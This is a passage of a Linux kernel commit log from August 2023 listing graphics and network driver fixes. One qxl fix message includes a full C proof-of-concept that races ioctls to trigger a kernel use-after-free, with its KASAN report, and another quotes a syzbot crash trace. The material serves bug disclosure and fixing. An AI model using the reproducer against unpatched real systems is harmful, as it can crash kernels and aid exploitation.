         - Fix the flow for ignoring GuC SLPC efficient frequency selection
         - Fix SDVO panel_type initialization
         - Fix display probe for IVB Q and IVB D GT2 server
      
        nouveau:
         - fix use-after-free in connector code
      
        qaic:
         - integer overflow check fix
         - fix slicing memory leak
      
        panel:
         - fix JDI LT070ME05000 probing
         - fix AUO G121EAN01 timings
      
        amdgpu:
         - SMU 13.x fixes
         - Fix mcbp parameter for gfx9
         - SMU 11.x fixes
         - Temporary fix for large numbers of XCP partitions
         - S0ix fixes
         - DCN 2.0 fix
      
        qxl:
         - fix use after free race in dumb object allocation"
      
      * tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm:
        drm/qxl: fix UAF on handle creation
        Revert "drm/edid: Fix csync detailed mode parsing"
        drm/nouveau/disp: fix use-after-free in error handling of nouveau_connector_create
        Revert "Revert "drm/amdgpu/display: change pipe policy for DCN 2.0""
        drm/amd: flush any delayed gfxoff on suspend entry
        drm/amdgpu: skip fence GFX interrupts disable/enable for S0ix
        drm/amdgpu: skip xcp drm device allocation when out of drm resource
        drm/amd/pm: Update pci link width for smu v13.0.6
        drm/amd/pm: Fix temperature unit of SMU v13.0.6
        drm/amdgpu/pm: fix throttle_status for other than MP1 11.0.7
        drm/amdgpu: disable mcbp if parameter zero is set
        drm/amd/pm: disallow the fan setting if there is no fan on smu 13.0.0
        accel/qaic: Clean up integer overflow checking in map_user_pages()
        accel/qaic: Fix slicing memory leak
        drm/i915: fix display probe for IVB Q and IVB D GT2 server
        drm/i915/sdvo: fix panel_type initialization
        drm/i915/guc/slpc: Restore efficient freq earlier
        drm/panel: simple: Fix AUO G121EAN01 panel timings according to the docs
        drm/panel: JDI LT070ME05000 simplify with dev_err_probe()
      1ada9c07
  4. 17 Aug, 2023 9 commits
    • Jakub Kicinski's avatar
      Merge branch '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue · 820a38d8
      Jakub Kicinski authored
      Tony Nguyen says:
      
      ====================
      Intel Wired LAN Driver Updates 2023-08-16 (iavf, i40e)
      
      This series contains updates to iavf and i40e drivers.
      
      Piotr adds checks for unsupported Flow Director rules on iavf.
      
      Andrii replaces incorrect 'write' messaging on read operations for i40e.
      
      * '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue:
        i40e: fix misleading debug logs
        iavf: fix FDIR rule fields masks validation
      ====================
      
      Link: https://lore.kernel.org/r/20230816193308.1307535-1-anthony.l.nguyen@intel.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      820a38d8
    • Wander Lairson Costa's avatar
      drm/qxl: fix UAF on handle creation · c611589b
      Wander Lairson Costa authored
      qxl_mode_dumb_create() dereferences the qobj returned by
      qxl_gem_object_create_with_handle(), but the handle is the only one
      holding a reference to it.
      
      A potential attacker could guess the returned handle value and closes it
      between the return of qxl_gem_object_create_with_handle() and the qobj
      usage, triggering a use-after-free scenario.
      
      Reproducer:
      
      int dri_fd =-1;
      struct drm_mode_create_dumb arg = {0};
      
      void gem_close(int handle);
      
      void* trigger(void* ptr)
      {
      	int ret;
      	arg.width = arg.height = 0x20;
      	arg.bpp = 32;
      	ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &arg);
      	if(ret)
      	{
      		perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      		exit(-1);
      	}
      	gem_close(arg.handle);
      	while(1) {
      		struct drm_mode_create_dumb args = {0};
      		args.width = args.height = 0x20;
      		args.bpp = 32;
      		ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &args);
      		if (ret) {
      			perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      			exit(-1);
      		}
      
      		printf("[*] DRM_IOCTL_MODE_CREATE_DUMB created, %d\n", args.handle);
      		gem_close(args.handle);
      	}
      	return NULL;
      }
      
      void gem_close(int handle)
      {
      	struct drm_gem_close args;
      	args.handle = handle;
      	int ret = ioctl(dri_fd, DRM_IOCTL_GEM_CLOSE, &args); // gem close handle
      	if (!ret)
      		printf("gem close handle %d\n", args.handle);
      }
      
      int main(void)
      {
      	dri_fd= open("/dev/dri/card0", O_RDWR);
      	printf("fd:%d\n", dri_fd);
      
      	if(dri_fd == -1)
      		return -1;
      
      	pthread_t tid1;
      
      	if(pthread_create(&tid1,NULL,trigger,NULL)){
      		perror("[*] thread_create tid1\n");
      		return -1;
      	}
      	while (1)
      	{
      		gem_close(arg.handle);
      	}
      	return 0;
      }
      
      This is a KASAN report:
      
      ==================================================================
      BUG: KASAN: slab-use-after-free in qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      Write of size 1 at addr ffff88801136c240 by task poc/515
      
      CPU: 1 PID: 515 Comm: poc Not tainted 6.3.0 #3
      Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
      Call Trace:
      <TASK>
      __dump_stack linux/lib/dump_stack.c:88
      dump_stack_lvl+0x48/0x70 linux/lib/dump_stack.c:106
      print_address_description linux/mm/kasan/report.c:319
      print_report+0xd2/0x660 linux/mm/kasan/report.c:430
      kasan_report+0xd2/0x110 linux/mm/kasan/report.c:536
      __asan_report_store1_noabort+0x17/0x30 linux/mm/kasan/report_generic.c:383
      qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      RIP: 0033:0x7ff5004ff5f7
      Code: 00 00 00 48 8b 05 99 c8 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 69 c8 0d 00 f7 d8 64 89 01 48
      
      RSP: 002b:00007ff500408ea8 EFLAGS: 00000286 ORIG_RAX: 0000000000000010
      RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff5004ff5f7
      RDX: 00007ff500408ec0 RSI: 00000000c02064b2 RDI: 0000000000000003
      RBP: 00007ff500408ef0 R08: 0000000000000000 R09: 000000000000002a
      R10: 0000000000000000 R11: 0000000000000286 R12: 00007fff1c6cdafe
      R13: 00007fff1c6cdaff R14: 00007ff500408fc0 R15: 0000000000802000
      </TASK>
      
      Allocated by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_alloc_info+0x1e/0x40 linux/mm/kasan/generic.c:510
      ____kasan_kmalloc linux/mm/kasan/common.c:374
      __kasan_kmalloc+0xc3/0xd0 linux/mm/kasan/common.c:383
      kasan_kmalloc linux/./include/linux/kasan.h:196
      kmalloc_trace+0x48/0xc0 linux/mm/slab_common.c:1066
      kmalloc linux/./include/linux/slab.h:580
      kzalloc linux/./include/linux/slab.h:720
      qxl_bo_create+0x11a/0x610 linux/drivers/gpu/drm/qxl/qxl_object.c:124
      qxl_gem_object_create+0xd9/0x360 linux/drivers/gpu/drm/qxl/qxl_gem.c:58
      qxl_gem_object_create_with_handle+0xa1/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:89
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      Freed by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_free_info+0x2e/0x60 linux/mm/kasan/generic.c:521
      ____kasan_slab_free linux/mm/kasan/common.c:236
      ____kasan_slab_free+0x180/0x1f0 linux/mm/kasan/common.c:200
      __kasan_slab_free+0x12/0x30 linux/mm/kasan/common.c:244
      kasan_slab_free linux/./include/linux/kasan.h:162
      slab_free_hook linux/mm/slub.c:1781
      slab_free_freelist_hook+0xd2/0x1a0 linux/mm/slub.c:1807
      slab_free linux/mm/slub.c:3787
      __kmem_cache_free+0x196/0x2d0 linux/mm/slub.c:3800
      kfree+0x78/0x120 linux/mm/slab_common.c:1019
      qxl_ttm_bo_destroy+0x140/0x1a0 linux/drivers/gpu/drm/qxl/qxl_object.c:49
      ttm_bo_release+0x678/0xa30 linux/drivers/gpu/drm/ttm/ttm_bo.c:381
      kref_put linux/./include/linux/kref.h:65
      ttm_bo_put+0x50/0x80 linux/drivers/gpu/drm/ttm/ttm_bo.c:393
      qxl_gem_object_free+0x3e/0x60 linux/drivers/gpu/drm/qxl/qxl_gem.c:42
      drm_gem_object_free+0x5c/0x90 linux/drivers/gpu/drm/drm_gem.c:974
      kref_put linux/./include/linux/kref.h:65
      __drm_gem_object_put linux/./include/drm/drm_gem.h:431
      drm_gem_object_put linux/./include/drm/drm_gem.h:444
      qxl_gem_object_create_with_handle+0x151/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:100
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      The buggy address belongs to the object at ffff88801136c000
      which belongs to the cache kmalloc-1k of size 1024
      The buggy address is located 576 bytes inside of
      freed 1024-byte region [ffff88801136c000, ffff88801136c400)
      
      The buggy address belongs to the physical page:
      page:0000000089fc329b refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11368
      head:0000000089fc329b order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0
      flags: 0xfffffc0010200(slab|head|node=0|zone=1|lastcpupid=0x1fffff)
      raw: 000fffffc0010200 ffff888007841dc0 dead000000000122 0000000000000000
      raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000
      page dumped because: kasan: bad access detected
      
      Memory state around the buggy address:
      ffff88801136c100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff88801136c180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      >ffff88801136c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ^
      ffff88801136c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff88801136c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ==================================================================
      Disabling lock debugging due to kernel taint
      
      Instead of returning a weak reference to the qxl_bo object, return the
      created drm_gem_object and let the caller decrement the reference count
      when it no longer needs it. As a convenience, if the caller is not
      interested in the gobj object, it can pass NULL to the parameter and the
      reference counting is descremented internally.
      
      The bug and the reproducer were originally found by the Zero Day Initiative project (ZDI-CAN-20940).
      
      Link: https://www.zerodayinitiative.com/Signed-off-by: default avatarWander Lairson Costa <wander@redhat.com>
      Cc: stable@vger.kernel.org
      Reviewed-by: default avatarDave Airlie <airlied@redhat.com>
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230814165119.90847-1-wander@redhat.com
      c611589b
    • Dave Airlie's avatar
      Merge tag 'amd-drm-fixes-6.5-2023-08-16' of... · 68c60b34
      Dave Airlie authored
      Merge tag 'amd-drm-fixes-6.5-2023-08-16' of https://gitlab.freedesktop.org/agd5f/linux into drm-fixes
      
      amd-drm-fixes-6.5-2023-08-16:
      
      amdgpu:
      - SMU 13.x fixes
      - Fix mcbp parameter for gfx9
      - SMU 11.x fixes
      - Temporary fix for large numbers of XCP partitions
      - S0ix fixes
      - DCN 2.0 fix
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      
      From: Alex Deucher <alexander.deucher@amd.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230816200226.10771-1-alexander.deucher@amd.com
      68c60b34
    • Dave Airlie's avatar
      Merge tag 'drm-misc-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-misc into drm-fixes · be48306f
      Dave Airlie authored
      One EPROBE_DEFER handling fix for the JDI LT070ME05000, a timing fix for
      the AUO G121EAN01 panel, an integer overflow and a memory leak fixes for
      the qaic accel, a use-after-free fix for nouveau and a revert for an
      alleged fix in EDID parsing.
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      
      From: Maxime Ripard <mripard@redhat.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/3olqt33em5uhxzjbqghwcwnvmw73h7bxkbdxookmnkecymd4vc@7ogm6gewpprq
      be48306f
    • Dave Airlie's avatar
      Merge tag 'drm-intel-fixes-2023-08-17' of... · dd64d8ae
      Dave Airlie authored
      Merge tag 'drm-intel-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-intel into drm-fixes
      
      - Fix the flow for ignoring GuC SLPC efficient frequency selection (Vinay)
      - Fix SDVO panel_type initialization (Jani)
      - Fix display probe for IVB Q and IVB D GT2 server (Jani)
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      
      From: Rodrigo Vivi <rodrigo.vivi@intel.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/ZN4yduyBU1Ev9dc7@intel.com
      dd64d8ae
    • Jakub Kicinski's avatar
      Merge tag 'mlx5-fixes-2023-08-16' of git://git.kernel.org/pub/scm/linux/kernel/git/saeed/linux · e9bbd601
      Jakub Kicinski authored
      Saeed Mahameed says:
      
      ====================
      mlx5 fixes 2023-08-16
      
      This series provides bug fixes to mlx5 driver.
      
      * tag 'mlx5-fixes-2023-08-16' of git://git.kernel.org/pub/scm/linux/kernel/git/saeed/linux:
        net/mlx5: Fix mlx5_cmd_update_root_ft() error flow
        net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT
      ====================
      
      Link: https://lore.kernel.org/r/20230816204108.53819-1-saeed@kernel.orgSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      e9bbd601
    • Marcin Szycik's avatar
      ice: Block switchdev mode when ADQ is active and vice versa · 43d00e10
      Marcin Szycik authored
      ADQ and switchdev are not supported simultaneously. Enabling both at the
      same time can result in nullptr dereference.
      
      To prevent this, check if ADQ is active when changing devlink mode to
      switchdev mode, and check if switchdev is active when enabling ADQ.
      
      Fixes: fbc7b27a ("ice: enable ndo_setup_tc support for mqprio_qdisc")
      Signed-off-by: default avatarMarcin Szycik <marcin.szycik@linux.intel.com>
      Reviewed-by: default avatarPrzemek Kitszel <przemyslaw.kitszel@intel.com>
      Tested-by: default avatarSujai Buvaneswaran <sujai.buvaneswaran@intel.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      Reviewed-by: default avatarSimon Horman <horms@kernel.org>
      Link: https://lore.kernel.org/r/20230816193405.1307580-1-anthony.l.nguyen@intel.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      43d00e10
    • Manish Chopra's avatar
      qede: fix firmware halt over suspend and resume · 2eb9625a
      Manish Chopra authored
      While performing certain power-off sequences, PCI drivers are
      called to suspend and resume their underlying devices through
      PCI PM (power management) interface. However this NIC hardware
      does not support PCI PM suspend/resume operations so system wide
      suspend/resume leads to bad MFW (management firmware) state which
      causes various follow-up errors in driver when communicating with
      the device/firmware afterwards.
      
      To fix this driver implements PCI PM suspend handler to indicate
      unsupported operation to the PCI subsystem explicitly, thus avoiding
      system to go into suspended/standby mode.
      
      Without this fix device/firmware does not recover unless system
      is power cycled.
      
      Fixes: 2950219d ("qede: Add basic network device support")
      Signed-off-by: default avatarManish Chopra <manishc@marvell.com>
      Signed-off-by: default avatarAlok Prasad <palok@marvell.com>
      Reviewed-by: default avatarJohn Meneghini <jmeneghi@redhat.com>
      Reviewed-by: default avatarSimon Horman <horms@kernel.org>
      Link: https://lore.kernel.org/r/20230816150711.59035-1-manishc@marvell.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      2eb9625a
    • Eric Dumazet's avatar
      net: do not allow gso_size to be set to GSO_BY_FRAGS · b616be6b
      Eric Dumazet authored
      One missing check in virtio_net_hdr_to_skb() allowed
      syzbot to crash kernels again [1]
      
      Do not allow gso_size to be set to GSO_BY_FRAGS (0xffff),
      because this magic value is used by the kernel.
      
      [1]
      general protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN
      KASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]
      CPU: 0 PID: 5039 Comm: syz-executor401 Not tainted 6.5.0-rc5-next-20230809-syzkaller #0
      Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023
      RIP: 0010:skb_segment+0x1a52/0x3ef0 net/core/skbuff.c:4500
      Code: 00 00 00 e9 ab eb ff ff e8 6b 96 5d f9 48 8b 84 24 00 01 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e ea 21 00 00 48 8b 84 24 00 01
      RSP: 0018:ffffc90003d3f1c8 EFLAGS: 00010202
      RAX: dffffc0000000000 RBX: 000000000001fffe RCX: 0000000000000000
      RDX: 000000000000000e RSI: ffffffff882a3115 RDI: 0000000000000070
      RBP: ffffc90003d3f378 R08: 0000000000000005 R09: 000000000000ffff
      R10: 000000000000ffff R11: 5ee4a93e456187d6 R12: 000000000001ffc6
      R13: dffffc0000000000 R14: 0000000000000008 R15: 000000000000ffff
      FS: 00005555563f2380(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000
      CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
      CR2: 0000000020020000 CR3: 000000001626d000 CR4: 00000000003506f0
      DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
      DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
      Call Trace:
      <TASK>
      udp6_ufo_fragment+0x9d2/0xd50 net/ipv6/udp_offload.c:109
      ipv6_gso_segment+0x5c4/0x17b0 net/ipv6/ip6_offload.c:120
      skb_mac_gso_segment+0x292/0x610 net/core/gso.c:53
      __skb_gso_segment+0x339/0x710 net/core/gso.c:124
      skb_gso_segment include/net/gso.h:83 [inline]
      validate_xmit_skb+0x3a5/0xf10 net/core/dev.c:3625
      __dev_queue_xmit+0x8f0/0x3d60 net/core/dev.c:4329
      dev_queue_xmit include/linux/netdevice.h:3082 [inline]
      packet_xmit+0x257/0x380 net/packet/af_packet.c:276
      packet_snd net/packet/af_packet.c:3087 [inline]
      packet_sendmsg+0x24c7/0x5570 net/packet/af_packet.c:3119
      sock_sendmsg_nosec net/socket.c:727 [inline]
      sock_sendmsg+0xd9/0x180 net/socket.c:750
      ____sys_sendmsg+0x6ac/0x940 net/socket.c:2496
      ___sys_sendmsg+0x135/0x1d0 net/socket.c:2550
      __sys_sendmsg+0x117/0x1e0 net/socket.c:2579
      do_syscall_x64 arch/x86/entry/common.c:50 [inline]
      do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x63/0xcd
      RIP: 0033:0x7ff27cdb34d9
      
      Fixes: 3953c46c ("sk_buff: allow segmenting based on frag sizes")
      Reported-by: default avatarsyzbot <syzkaller@googlegroups.com>
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Cc: Xin Long <lucien.xin@gmail.com>
      Cc: "Michael S. Tsirkin" <mst@redhat.com>
      Cc: Jason Wang <jasowang@redhat.com>
      Reviewed-by: default avatarWillem de Bruijn <willemb@google.com>
      Reviewed-by: default avatarMarcelo Ricardo Leitner <marcelo.leitner@gmail.com>
      Reviewed-by: default avatarXuan Zhuo <xuanzhuo@linux.alibaba.com>
      Link: https://lore.kernel.org/r/20230816142158.1779798-1-edumazet@google.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      b616be6b